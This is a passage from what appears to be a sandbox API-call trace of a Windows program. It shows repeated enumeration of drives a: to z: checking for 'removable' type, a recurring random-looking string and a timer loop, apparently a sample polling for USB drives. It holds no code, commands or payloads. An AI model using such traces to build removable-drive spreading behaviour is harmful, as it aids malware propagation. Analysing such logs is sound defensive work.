(lpRootPathName="a:\\") returned 0x1 [0216.587] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.587] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.587] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.588] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.588] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.588] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.588] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.588] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.588] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.589] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.589] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.589] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.589] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.589] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.590] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.593] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.593] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.593] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.594] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.594] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.594] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.594] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.594] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.595] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.597] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0216.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0216.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.624] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.624] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.624] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.624] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.624] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.624] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0216.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0216.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0216.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0216.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0216.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0216.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e2c0 [0216.625] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e2c0 | out: hHeap=0x12c0000) returned 1 [0216.625] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0216.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.627] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.627] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.627] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.627] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.627] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.627] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0216.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0216.627] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.627] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0216.627] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0216.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.627] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0216.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0216.628] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.628] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.628] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.628] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.628] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.629] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.629] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.629] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.629] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.629] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.629] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.630] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.630] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.630] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.631] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.631] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.631] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.631] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.631] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.632] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.632] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.632] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.632] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.633] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.633] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.633] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.633] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0216.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0216.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.634] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.634] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.634] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0216.634] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.634] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0216.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.634] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.634] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0216.634] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.634] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0216.634] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e80 [0216.634] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e80 | out: hHeap=0x12c0000) returned 1 [0216.634] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0216.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.635] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0216.635] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0216.635] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0216.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0216.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.635] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.635] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0216.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0216.635] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.635] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0216.635] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.635] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.635] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0216.635] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.636] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0216.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0216.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.636] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.636] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.636] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.637] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.637] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.637] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.638] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.638] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.638] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.638] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.638] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.639] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.639] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.639] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.639] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.639] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.639] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.640] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.640] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.640] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.640] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.640] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.641] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.641] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.641] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.641] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.641] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0216.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0216.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.642] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.643] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.643] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.643] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.643] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.643] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.643] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0216.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0216.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0216.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0216.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0216.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e440 [0216.644] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e440 | out: hHeap=0x12c0000) returned 1 [0216.644] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.644] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0216.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.644] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0216.644] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0216.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0216.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0216.645] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 